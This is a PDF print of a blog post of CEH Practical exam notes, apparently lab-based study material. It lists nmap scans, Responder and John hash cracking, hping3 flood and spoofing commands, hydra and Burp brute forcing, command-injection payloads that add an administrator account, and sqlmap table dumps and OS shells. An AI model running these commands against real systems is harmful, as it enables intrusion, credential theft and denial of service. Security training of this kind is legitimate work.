14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

Home Networking CEH Practical cyber security Contact Us

𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠

Home Networking

0

0

CEH Practical

cyber security

Contact Us

CEH

Practica

notes

Vihan Mehta

February 4, 2022

https://www.fencytech.com/?p=2259 1/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

Module 03:
Scanning
Networks

->Lab1-Task1:
Host discovery

->nmap -sn -PR

[IP]
->-sn: Disable
port scan
->-PR: ARP ping
scan
->nmap -sn -PU
[IP]
->-PU: UDP ping
scan
->nmap -sn -PE
[IP or IP Range]
->-PE: ICMP
ECHO ping scan
->nmap -sn -PP
[IP]
->-PP: ICMP
timestamp ping
scan
->nmap -sn -PM
[IP]
->-PM: ICMP

address mask ping

https://www.fencytech.com/?p=2259 2/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

scan
->nmap -sn -PS
[IP]
->-PS: TCP SYN
Ping scan
->nmap -sn -PA
[IP]
->-PA: TCP ACK
Ping scan
->nmap -sn -PO
[IP]
->-PO: IP Protocol
Ping scan

Lab2-Task3: Port
and Service
Discovery

->nmap -sT -v [IP]

->-sT: TCP
connect/full open
scan
->-v: Verbose
output
->nmap -sS -v [IP]
->-sS: Stealth
scan/TCP hall-
open scan
->nmap -sX -v [IP]
->-sX: Xmax scan 

https://www.fencytech.com/?p=2259 3/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

->nmap -sM -v
[IP]
->-sM: TCP
Maimon scan
->nmap -sA -v
[IP]
->-sA: ACK flag
probe scan
->nmap -sU -v
[IP]
->-sU: UDP scan
->nmap -sI -v [IP]
->-sI: IDLE/IPID
Header scan
->nmap -sY -v [IP]
->-sY: SCTP INIT
Scan
->nmap -sZ -v [IP]
->-sZ: SCTP
COOKIE ECHO
Scan
->nmap -sV -v
[IP]
->-sV: Detect
service versions
->nmap -A -v [IP]
->-A: Aggressive
scan

https://www.fencytech.com/?p=2259 4/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

Lab3-Task2: OS
Discovery

->nmap -A -v [IP]
->-A: Aggressive
scan
->nmap -O -v [IP]
->-O: OS
discovery
->nmap –script
smb-os-
discovery.nse [IP]
->-–script: Specify
the customized
script
->smb-os-
discovery.nse:
Determine the OS,
computer name,
domain,
workgroup, and
current time over
the SMB protocol
(Port 445 or 139)

Module 04:
Enumeration

Lab2-Task1:

Enumerate SNMP

https://www.fencytech.com/?p=2259 5/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

using snmp-check

nmap -sU -p
161 [IP]
->snmp-
check [IP]
Addition

nbtstat -a IP

nbtstat -c

Module 06:
System
Hacking
Lab1-Task1:
Perform
Active
Online
Attack to
Crack the
System’s
Password
using
Responder

->Linux:

cd

cd
Responder 

https://www.fencytech.com/?p=2259 6/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

chmox +x
. /Responder.
py
->sudo
. /Responder.
py -I eth0

passwd: ****
->Windows

run

\CEH-Tools
->Linux:

Home/Respo
nder/logs/S
MB-
NTMLv2-
SSP-[IP].txt

sudo snap
install john-
the-ripper

passwd: ****
->sudo john
/home/ubunt
u/Responder
/logs/SMB-
NTLMv2-
SSP-
10.10.10.10.
txt Lab3-

Task6:
https://www.fencytech.com/?p=2259 7/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

Covert
Channels
using
Covert_TCP

->Attacker:

cd Desktop

mkdir Send

cd Send

echo
“Secret”-
>message.tx
t

Place-
>Network

Ctrl+L
->smb: //[IP]

Account &
Password

copy and
paste
covert_tcp.c
->cc -o
covert_tcp
covert_tcp.c
->Target:
->tcpdump -


https://www.fencytech.com/?p=2259 8/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

nvvx port
8888 -I lo

cd Desktop

mkdir
Receive

cd Receive

File->Ctrl+L

smb: //[IP]

copy and
paste
covert_tcp.c

cc -o
covert_tcp
covert_tcp.c
-
>. /covert_tc
p -dest
10.10.10.9 -
source
10.10.10.13
-source_port
9999 -
dest_port
8888 -
server -file
/home/ubunt
u/Desktop/R
eceive/receiv 

https://www.fencytech.com/?p=2259 9/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

e.txt
->Tcpdump
captures no
packets
->Attacker
-
>. /covert_tc
p -dest
10.10.10.9 -
source
10.10.10.13
-source_port
8888 -
dest_port
9999 -file
/home/attack
er/Desktop/s
end/messag
e.txt

Wireshark
(message
string being
send in
individual
packet )
Lab0-Task0:
Rainbowcrac
k and
QuickStego


https://www.fencytech.com/?p=2259 10/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

Use
Winrtgen to
generate a
rainbow
table

Launch
RainbowCra
ck

File->Load
NTLM
Hashes from
PWDUMP
File

Rainbow
Table-
>Search
Rainbow
Table

Use the
generated
rainbow
table

RainbowCra
ck
automaticall
y starts to
crack the
hashes


https://www.fencytech.com/?p=2259 11/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

Lab 0-Task1:
Rainbowcrac
k and
QuickStego

Launch
QuickStego

Open Image,
and select
target .jpg
file

Open Text,
and select a
txt file

Hide text,
save image
file

Re-launch,
Open Image

Select stego
file

Hidden text
shows up

Module 08:
Sniffing
Lab2-Task1:
Password

Sniffing
https://www.fencytech.com/?p=2259 12/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

using
Wireshark

->Attacker

Wireshark
->Target

www.movie
scope.com

Login
->Attacker

Stop capture

File-\>Save
as

Filter:
http.request.
method==P
OST

RDP log in
Target

service

start
Remote
Packet
Capture
Protocol v.0
(experiment
al) 

https://www.fencytech.com/?p=2259 13/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

Log off
Target

Wireshark-
\>Capture
options-
\>Manage
Interface-
\>Remote
Interfaces

Add a
remote host
and its
interface

Fill info
->Target

Log in

Browse
website and
log in
->Attacker

Get packets

Module 10:
Denial-of-Service

Lab1-Task2:
Perform a DoS


https://www.fencytech.com/?p=2259 14/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

Attack on a Target
Host using hping3

->Target:

Wireshark-
\>Ethernet
->Attacker
->hping3 -S
[Target IP] -
a [Spoofable
IP] -p 22 -
flood
->-S: Set the
SYN flag
->-a: Spoof
the IP
address
->-p:
Specify the
destination
port
->–flood:
Send a huge
number of
packets
->Target

Check
wireshark
->Attacker 

https://www.fencytech.com/?p=2259 15/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

(Perform
PoD)
->hping3 -d
65538 -S -p
21 –flood
[Target IP]
->-d:
Specify data
size
->-S: Set the
SYN flag
->Attacker
(Perform
UDP
application
layer flood
attack)

nmap -p
139
10.10.10.19
(check
service)
->hping3 -2
-p 139 –
flood [IP]
->-2:
Specify UDP
mode
->Other

UDP-based

https://www.fencytech.com/?p=2259 16/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

applications
and their
ports

CharGen
UDP Port 19

SNMPv2
UDP Port
161

QOTD UDP
Port 17

RPC UDP
Port 135

SSDP UDP
Port 1900

CLDAP UDP
Port 389

TFTP UDP
Port 69

NetBIOS
UDP Port
137,138,13
9

NTP UDP
Port 123

Quake
Network
Protocol


https://www.fencytech.com/?p=2259 17/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

UDP Port
26000

VoIP UDP
Port 5060

Module 13:
Hacking
Web
Servers

Lab2-Task1:
Crack FTP
Credentials
using a
Dictionary
Attack

nmap -p 21
[IP]
->hydra -L
usernames.t
xt -P
passwords.t
xt
ftp: //10.10.1
0.10 Module
14: Hacking
Web
Applications
Lab2-Task1:

Perform a
https://www.fencytech.com/?p=2259 18/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

Brute-force
Attack using
Burp Suite

Set proxy for

browser:
127.0.0.1:80
80

Burpsuite

Type
random
credentials

capture the
request,
right click-
\>send to
Intrucder

Intruder-
\>Positions

Clear $

Attack type:
Cluster
bomb

select
account and
password
value, Add $

Payloads:

Load

https://www.fencytech.com/?p=2259 19/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

wordlist file
for set 1 and
set 2

start attack
->filter
status==302

open the
raw, get the
credentials

recover
proxy
settings

Lab2-Task3:
Exploit
Parameter
Tampering
and XSS
Vulnerabiliti
es in Web
Applications

Log in a
website,
change the
parameter
value (id )in
the URL

https://www.fencytech.com/?p=2259 20/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

Conduct a
XSS attack:
Submit
script codes
via text area
Lab2-Task5:
Enumerate
and Hack a
Web
Application
using
WPScan and
Metasploit

->wpscan –api-
token (token) –url
http: //10.10.10.16
:8080/CEH –
plugins-detection
aggressive –
enumerate u
->–enumerate u:
Specify the
enumeration of
users
->API Token:
Register at
https: //wpscan.co
m/register


https://www.fencytech.com/?p=2259 21/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

service
postgresql
start

msfconsole
->use
auxiliary/sca
nner/http/wo
rdpress_logi
n_enum

show
options
->set
PASS_FILE
password.tx
t
->set
RHOST
10.10.10.16
->set
RPORT
8080
->set
TARGETURI
http: //10.10.
10.16:8080/
CEH
->set
USERNAME
admin


https://www.fencytech.com/?p=2259 22/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

run

Find the
credential
Lab2-Task6:
Exploit a
Remote
Command
Execution
Vulnerability
to
Compromise
a Target
Web Server
(DVWA low
level
security)

If found
command
injection
vulnerability
in an input
textfield

| hostname

| whoami
->| tasklist|
Taskkill /PID
/F
->/PID:
Process ID 

https://www.fencytech.com/?p=2259 23/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

value od the
process
->/F:
Forcefully
terminate
the process

| dir C:\
->| net user
->| net user
user001
/Add
->| net user
user001
->| net
localgroup
Administrat
ors user001
/Add

Use created
account
user001 to
log in
remotely

Module 15:
SQL
Injection

https://www.fencytech.com/?p=2259 24/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

Lab1-Task2:
Perform an
SQL
Injection
Attack
Against
MSSQL to
Extract
Databases
using
sqlmap

Login a
website

Inspect
element

Dev tools-
\>Console:
document.co
okie
->sqlmap -u
“http: //www.
moviescope.
com/viewpro
file.aspx?
id=1″ –
cookie=”valu
e” –dbs
->-u: Specify
the target 

https://www.fencytech.com/?p=2259 25/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

URL
->–cookie:
Specify the
HTTP cookie
header value
->–dbs:
Enumerate
DBMS
databases

Get a list of
databases

Select a
database to
extract its
tables
->sqlmap -u
“http: //www.
moviescope.
com/viewpro
file.aspx?
id=1″ –
cookie=”valu
e” -D
moviescope
–tables
->-D:
Specify the
DBMS
database to

enumerate
https://www.fencytech.com/?p=2259 26/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

->–tables:
Enumerate
DBMS
database
tables

Get a list of
tables

Select a
column
->sqlmap -u
“http: //www.
moviescope.
com/viewpro
file.aspx?
id=1″ –
cookie=”valu
e” -D
moviescope
–T
User_Login
–dump

Get table
data of this
column
->sqlmap -u
“http: //www.
moviescope.
com/viewpro
file.aspx? 

https://www.fencytech.com/?p=2259 27/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

id=1″ –
cookie=”valu
e” –os-shell

Get the OS
Shell

TASKLIST
Module 20:
Cryptograph
y Lab1-
Task2:
Calculate
MD5 Hashes
using MD5
Calculator

Nothing
special
Lab4-Task1:
Perform
Disk
Encryption
using
VeraCrypt

Click
VeraCrypt

Create
Volumn

Create an
encrypted


https://www.fencytech.com/?p=2259 28/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

file
container

Specify a
path and file
name

Set
password

Select NAT

Move the
mouse
randomly for
some
seconds,
and click
Format

Exit

Select a
drive, select
file, open,
mount

Input
password

Dismount

Exit Module
Appendix:
Covered
Tools


https://www.fencytech.com/?p=2259 29/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

->Nmap

Multiple
Labs
->Hydra

Module 13:
Lab2-Task1
->Sqlmap

Module 15:
Lab1-Task2
->WPScan

Module 14:
Lab2-Task5

wpscan –-
url
http: //10.10.
10.10 -t 50
-U admin -P
rockyou.txt
->Nikto

https: //zhuan
lan.zhihu.co
m/p/124246
499
->John

https://www.fencytech.com/?p=2259 30/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

Module 06:
Lab1-Task1
->Hashcat
->Crack
MD5
passwords
with a
wordlist:

hashcat
hash.txt -m
0 -a 0
hash.txt
/usr/share/w
ordlists/rock
you.txt
->Crack
MD5
passwords
in a certain
format:

hashcat -m
0 -a 3
. /hash.txt
‘SKY-
HQNT-?d?d?
d?d’

https: //xz.ali
yun.com/t/4
008 

https://www.fencytech.com/?p=2259 31/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

https: //tools.
kali.org/pass
word-
attacks/hash
cat
->Metasploit

Module 14:
Lab2-Task5
-
>Responder
LLMNR

Module 06:
Lab1-Task1
->Wireshark
or Tcpdump

Multiple
Labs
->Steghide
->Hide

steghide
embed -cf
[img file] -ef
[file to be
hide]

steghide
embed -cf
1.jpg -ef
1.txt


https://www.fencytech.com/?p=2259 32/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

Enter
password or
skip
->Extract

steghide
info 1.jpg

steghide
extract -sf
1.jpg

Enter
password if
it does exist
-
>OpenStego

https: //www
.openstego.c
om/
-
>QuickStego

Module 06:
Lab0-Task1
->Dirb (Web
content
scanner)

https: //medi
um.com/tech
-zoom/dirb- 

https://www.fencytech.com/?p=2259 33/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

a-web-
content-
scanner-
bc9cba624c
86

https: //blog.
csdn.net/wei
xin_449121
69/article/de
tails/105655
195
-
>Searchsploi
t (Exploit-
DB)

https: //www
.hackingartic
les.in/compr
ehensive-
guide-on-
searchsploit/
->Crunch
(wordlist
generator)

https: //www
.cnblogs.com
/wpjamer/p/
9913380.ht
ml 

https://www.fencytech.com/?p=2259 34/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

->Cewl (URL
spider)

https: //www
.freebuf.com/
articles/net
work/19012
8.html
->Veracrypt

Module 20:
Lab4-Task1
->Hashcalc

Module 20:
Lab1-Task1
(Nothing
special)
->Rainbow
Crack

Module 06:
Lab0-Task0
->Windows
SMB

smbclient -L
[IP]

smbclient
\ip\sharenam
e


https://www.fencytech.com/?p=2259 35/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

nmap -p
445 -sV –
script smb-
enum-
services [IP]
->Run Nmap
at the
beginning

nmap -sn -
PR
192.168.1.1/
24 -oN ip.txt

nmap -A -T4
-vv -iL ip.txt
-oN
nmap.txt

nmap -sU -
sV -A -T4 -v
-oN udp.txt

Useful info about

the content

https: //www.statio
nx.net/nmap-
cheat-sheet/

https://www.fencytech.com/?p=2259 36/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

https: //www.poftu
t.com/how-to-
scan-wordpress-
sites-with-
wpscan-tutorial-
for-security-
vulnerabilities/

https: //www.hacki
ngarticles.in/datab
ase-penetration-
testing-using-
sqlmap-part-1/

https: //securitytut
orials.co.uk/brute-
forcing-
passwords-with-
thc-hydra/

https: //linuxconfig.
org/password-
cracking-with-
john-the-ripper-
on-linux


https://www.fencytech.com/?p=2259 37/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

https: //www.notso
secure.com/pwnin
g-with-responder-
a-pentesters-
guide/

https: //unit42.palo
altonetworks.com/
using-wireshark-
display-filter-
expressions/

Happy hacking –
best wishes for
exam.

Note: – This notes

is not made by me
, all the credits
and respect to
owner. Thank you.

 Share

 Tweet

 


https://www.fencytech.com/?p=2259 38/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

CEH Practical

Tagged in: cyber

security , networking

Show

Comments

Other
Netwo
stories
rking

topic

thats

helpful

in

cyberse
Previous

curity
Story

Information

Security

February 2022

November 2021 

https://www.fencytech.com/?p=2259 39/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥

𝔣𝔢𝔫𝔠𝔶𝔱𝔢

fencytech.com is hosted by Simafri

https://www.fencytech.com/?p=2259 40/40